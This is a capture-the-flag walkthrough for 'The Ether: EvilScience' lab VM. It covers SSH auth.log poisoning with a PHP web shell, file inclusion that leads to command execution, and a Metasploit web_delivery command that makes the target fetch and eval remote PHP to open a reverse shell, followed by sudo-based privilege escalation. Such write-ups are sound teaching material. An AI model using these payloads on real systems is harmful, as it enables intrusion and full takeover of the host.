The Ether: CTF walkthrough

Information

Name: The Ether: EvilScience

Date of release: 26 Oct 2017

Author: f1re_w1re

Series: The Ether

Web page: https://securityshards.wordpress.com/2017/10/26/the-ether-a-new-boot-2-root-hacking-challenge/

Note that the VM from VulnHub have issues. You have to download the VM from the author’s website.


Recognition

We use arp-scan to find the IP address of the VM.

arp-scan

Then, we scans the VM to find open ports and running services.

[email protected]:~# nmap -A -F 192.168.1.54

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (192.168.1.54)
Host is up (0.00074s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms theether-1.home (192.168.1.54)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds
[email protected]:~#


Remote Command Execution

After few scan and some research with the OWASP-Zap tool I found that we are able to read the content of the auth.log file where are stored SSH connections information.

LFI

We can poisoned this log file with this following connection attempt.

[email protected]:~# ssh '<?php echo system($_GET['c']);?>'@192.168.1.54
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
<?php echo system($_GET[c]);?>@192.168.1.54: Permission denied (publickey,password).
[email protected]:~#

Then, to check if we have an Remote Command Execution (RCE) we can execute this query.

[email protected]:~# curl 'http://192.168.1.54/index.php?file=/var/log/auth.log&c=ls' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
xxxlogauditorxxx.py from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body
[email protected]:~#


From RCE to Reverse Shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

[email protected]:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) >

I changed the SRVPORT (default 8080 is used by OWASP-Zap), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
TARGET => 1
msf exploit(web_delivery) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:9090/DBoQOU8UZc3Qfb
[*] Local IP: http://192.168.1.104:9090/DBoQOU8UZc3Qfb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"

msf exploit(web_delivery) >

Finally, we execute the PHP command to gain a reverse shell.

[email protected]:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = '''http://192.168.1.54/index.php?file=/var/log/auth.log&c=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"'''
>>> resp = requests.get(url)

Let’s get a TTY with low privilege.

Low privilege shell


Privilege Escalation

A weird python script can be found in the /var/www/html/theEther.com/public_html directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41 xxxlogauditorxxx.py
bash-4.3$

Moreover, we can execute this script with root privilege without password.

sudo privileges

Plus, this script execute the cat command, so we are able to run any commands we want with root privilege.

Exploit PoC

We upload and we execute a reverse shell on the system.

Root shell

We read the flag hidden in a PNG file.

The flag

Finally, we decode the base64 flag.

The flag decoded



break

Comments